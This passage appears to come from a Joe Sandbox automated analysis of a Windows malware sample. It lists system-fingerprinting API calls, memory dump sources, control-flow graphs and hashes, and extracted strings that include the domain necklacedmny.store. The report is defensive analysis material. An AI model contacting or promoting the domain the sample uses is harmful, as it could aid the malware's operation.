239->229 240->231 241->231
                                                                        APIs
                                                                        • SysAllocString.OLEAUT32(49FB4BE2), ref: 0063BD1E
                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0063BD67
                                                                        • SysFreeString.OLEAUT32(?), ref: 0063C0A4
                                                                        • SysFreeString.OLEAUT32(?), ref: 0063C0AA
                                                                        • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,49FB4BE2,00000000,00000000,00000000,00000000), ref: 0063C0F7
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                        • String ID: WC$ZQ
                                                                        • API String ID: 1773362589-1722601914
                                                                        • Opcode ID: 1f2b409164a7c6d30ce08534f2f9fe198d47b4fa1a80a0d08fbe098040081da2
                                                                        • Instruction ID: 4c450017d67c522753375dcf850afc68ab9e6b6269fcedda252ce8b41d1bca91
                                                                        • Opcode Fuzzy Hash: 1f2b409164a7c6d30ce08534f2f9fe198d47b4fa1a80a0d08fbe098040081da2
                                                                        • Instruction Fuzzy Hash: 53C1CE76A08341ABE710CF60D855B5FBBE6FFC6314F10891CF194AB2A0D775990ACB86
                                                                        Function 0060E1A0 Relevance: 11.8, Strings: 9, Instructions: 540COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 246 60e1a0-60e1bf 247 60e1c0-60e1ef 246->247 247->247 248 60e1f1-60e22f 247->248 249 60e230-60e263 248->249 249->249 250 60e265-60e26c 249->250 251 60e26f-60e27d call 63fc50 250->251 254 60e3e0 251->254 255 60e3c0-60e3c5 251->255 256 60e3e2-60e3ea 251->256 257 60e602-60e64f 251->257 258 60e284-60e286 251->258 259 60e485-60e491 251->259 260 60e449-60e456 251->260 261 60e28b-60e3be call 643a90 * 12 251->261 262 60e3cc-60e3d4 251->262 263 60e5ee-60e5f2 251->263 264 60e430-60e436 call 60ec20 251->264 265 60e3f1-60e415 call 63c620 call 60e990 251->265 266 60e5f7 251->266 267 60e498-60e59f 251->267 268 60e5fc 251->268 269 60e41e-60e427 call 60ec20 251->269 270 60e43f-60e442 251->270 254->256 255->257 255->259 255->262 255->263 255->266 255->267 255->268 271 60e740 255->271 272 60e742-60e749 255->272 273 60e736-60e73b 255->273 274 60e66f-60e6bf 255->274 256->255 256->257 256->259 256->260 256->262 256->263 256->264 256->265 256->266 256->267 256->268 256->269 256->270 256->271 256->272 256->273 256->274 277 60e650-60e66d 257->277 279 60e97b-60e985 258->279 259->257 259->263 259->266 259->267 259->268 259->271 259->272 259->273 259->274 283 60e471-60e47e 260->283 284 60e458-60e45a 260->284 261->254 262->254 276 60e976-60e978 263->276 264->270 265->269 266->268 275 60e5a0-60e5cf 267->275 269->264 270->255 270->257 270->259 270->260 270->262 270->263 270->266 270->267 270->268 270->271 270->272 270->273 270->274 291 60e750-60e771 272->291 292 60e810-60e818 272->292 293 60e850 272->293 294 60e860-60e878 272->294 295 60e962-60e974 call 63e210 272->295 296 60e952-60e957 272->296 297 60e852-60e859 272->297 298 60e8b6-60e8d4 call 60e990 272->298 273->271 286 60e6c0-60e6dd 274->286 275->275 285 60e5d1-60e5e7 call 60f190 275->285 276->279 277->274 277->277 283->257 283->259 283->262 283->263 283->266 283->267 283->268 283->271 283->272 283->273 283->274 299 60e460-60e46f 284->299 285->257 285->263 285->268 285->271 285->272 285->273 285->274 285->291 285->292 285->293 285->294 285->295 285->296 285->297 285->298 286->286 302 60e6df-60e6ea 286->302 313 60e780-60e7c3 291->313 301 60e820-60e82a 292->301 294->295 294->296 304 60e840-60e84f 294->304 305 60e890 294->305 306 60e950 294->306 307 60e960 294->307 308 60e892-60e8b4 294->308 309 60e87f-60e882 294->309 295->276 296->307 297->294 297->298 298->306 299->283 299->299 301->301 316 60e82c-60e83e 301->316 317 60e720 302->317 318 60e6ec-60e6f0 302->318 304->293 306->296 308->304 309->305 313->313 314 60e7c5-60e7ce 313->314 323 60e7d0-60e7da 314->323 324 60e802-60e809 314->324 316->293 328 60e728 317->328 325 60e707-60e70b 318->325 327 60e7e7-60e7eb 323->327 324->292 324->293 324->294 324->296 324->297 324->298 325->328 329 60e70d-60e714 325->329 331 60e800 327->331 332 60e7ed-60e7f4 327->332 341 60e730 328->341 333 60e716-60e718 329->333 334 60e71a 329->334 331->324 336 60e7f6-60e7f8 332->336 337 60e7fa 332->337 333->334 338 60e700-60e705 334->338 339 60e71c-60e71e 334->339 336->337 342 60e7e0-60e7e5 337->342 343 60e7fc-60e7fe 337->343 338->325 338->341 339->338 341->273 342->324 342->327 343->342
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: B`$Ehrd$R`$b`$i[k]$necklacedmny.store$n|of$txLL$`
                                                                        • API String ID: 0-1253263819
                                                                        • Opcode ID: 374fd621f6711220731f767eaa90f59ac0c4600341fabbd3ab4a064c6d7ec24f
                                                                        • Instruction ID: 2f5ffa6c6400edf20d3af5e21d37155ea03bd3193b11fe0ac1d30641b3aa0c8a
                                                                        • Opcode Fuzzy Hash: 374fd621f6711220731f767eaa90f59ac0c4600341fabbd3ab4a064c6d7ec24f
                                                                        • Instruction Fuzzy Hash: DA02F775948350CFD314CF25EC9266BBBE3EB86704F185D2CE4859B352E7368909CBA2
                                                                        Function 00610460 Relevance: 11.7, Strings: 9, Instructions: 454COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 360 610460-6106bb 361 6106c0-6106f4 360->361 361->361 362 6106f6-61070e 361->362 364 610715-610717 362->364 365 61071c-610736 362->365 366 610b71-610b7b 364->366 367 610740-61076e 365->367 367->367 368 610770-610790 367->368 370 6108c3-6108d8 368->370 371 610ac2 368->371 372 610b67 368->372 373 610906-610973 368->373 374 610b49 368->374 375 610a8b-610aad 368->375 376 610b0c-610b15 368->376 377 610acf 368->377 378 6108ae-6108bc 368->378 379 610af0-610aff 368->379 380 610ad5-610aeb 368->380 381 610b35 368->381 382 610797-6107c1 368->382 383 610b1c-610b2e 368->383 384 6108df-6108ff 368->384 385 610b3e-610b40 368->385 370->371 370->372 370->373 370->374 370->375 370->376 370->377 370->379 370->380 370->381 370->383 370->384 370->385 387 610b83 370->387 388 610b53 370->388 389 610b5a-610b61 370->389 390 610b7c 370->390 371->377 392 610b6e 372->392 391 610980-6109a5 373->391 374->388 393 610ab4-610abb 375->393 376->372 376->374 376->381 376->383 376->385 376->387 376->388 376->389 376->390 378->370 378->371 378->372 378->373 378->374 378->375 378->376 378->377 378->379 378->380 378->381 378->383 378->384 378->385 378->387 378->388 378->389 378->390 396 610b06 379->396 380->379 381->385 386 6107d0-6107f8 382->386 383->372 383->374 383->381 383->385 383->387 383->388 383->389 383->390 384->371 384->372 384->373 384->374 384->375 384->376 384->377 384->379 384->380 384->381 384->383 384->385 384->387 384->388 384->389 384->390 385->374 386->386 395 6107fa-610826 386->395 401 610b8a 387->401 388->389 389->372 390->387 391->391 399 6109a7-6109af 391->399 392->366 393->371 393->372 393->374 393->376 393->377 393->379 393->380 393->381 393->383 393->385 393->387 393->388 393->389 393->390 402 610830-61087a 395->402 396->376 403 6109d1-6109e0 399->403 404 6109b1-6109b9 399->404 401->401 402->402 405 61087c-610892 402->405 407 6109e2-6109e4 403->407 408 610a05-610a25 403->408 406 6109c0-6109cf 404->406 413 610897-6108a7 405->413 406->403 406->406 410 6109f0-610a01 407->410 409 610a30-610a6d 408->409 409->409 412 610a6f-610a84 409->412 410->410 411 610a03 410->411 411->408 412->375 413->370 413->371 413->372 413->373 413->374 413->375 413->376 413->377 413->378 413->379 413->380 413->381 413->383 413->384 413->385 413->387 413->388 413->389 413->390
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !m%k$#i4g$+e(c$@-+$g!~_$necklacedmny.store$v%r#$y)v'$yw
                                                                        • API String ID: 0-3070082895
                                                                        • Opcode ID: b08589e95c5642ea1d3dfb7f3323f356ec4568ee22bc7a916733cc7173e20a82
                                                                        • Instruction ID: 361dbd06fe90602174e6346d0da00984fcd033e4cca9787495c8450cf029d849
                                                                        • Opcode Fuzzy Hash: b08589e95c5642ea1d3dfb7f3323f356ec4568ee22bc7a916733cc7173e20a82
                                                                        • Instruction Fuzzy Hash: 8FF1A8B514C381DFE7248F24D8947ABBBF6EB86300F10AD2CE5C99B251D7B48845CB92
                                                                        Function 0062F9D0 Relevance: 10.1, APIs: 3, Strings: 2, Instructions: 1324COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 0062F9FB
                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 0062FABA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155862356.0000000000601000.00000040.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                        • Associated: 00000000.00000002.2155846625.0000000000600000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155895274.0000000000659000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155912222.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155926723.0000000000665000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155940624.0000000000666000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2155955886.0000000000667000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156039473.00000000007CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156053250.00000000007CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156070174.00000000007F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156103073.000000000081B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156115455.000000000081C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156130626.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156143843.0000000000826000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156156791.0000000000827000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156169515.0000000000828000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156182839.000000000082F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156197184.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156213393.0000000000851000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156227217.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156239801.0000000000859000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156253486.000000000085D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156266060.000000000085E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156294268.0000000000868000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156312435.000000000087D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156325652.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156337917.0000000000880000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156351117.0000000000887000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156364474.0000000000890000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156376920.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156391412.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156404038.0000000000895000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156416779.0000000000896000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156430199.000000000089C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156449646.00000000008BC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156464953.00000000008E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156502636.000000000090C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156519788.000000000090D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.000000000090E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156533988.0000000000915000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156564951.0000000000923000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2156577837.0000000000924000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_600000_file.jbxd
                                                                        Similarity
                                                                        • API ID: ComputerName
                                                                        • String ID: \X"Q$a|cI
                                                                        • API String ID: 3545744682-3233608862
                                                                        • Opcode ID: e67b2f440c595b600bf38ee95204c51c054e86a459b76fcf45b040a5a62a8759
                                                                        • Instruction ID: 839be864ee41e1bcbd4577055ec7b6c393c8ca1a5e4711f30dde0ea98c62eb7d
                                                                        • Opcode Fuzzy Hash: e67b2f440c595b600bf38ee95204c51c054e86a459b76fcf45b040a5a62a8759
                                                                        • Instruction Fuzzy Hash: 519208716047818FE7298F39C4A0762BBE2EF96314F18C6ADC4D68B792D779D806CB50
                                                                        Function 006279B0 Relevance: 8.0, Strings: 6, Instructions: 507COMMON
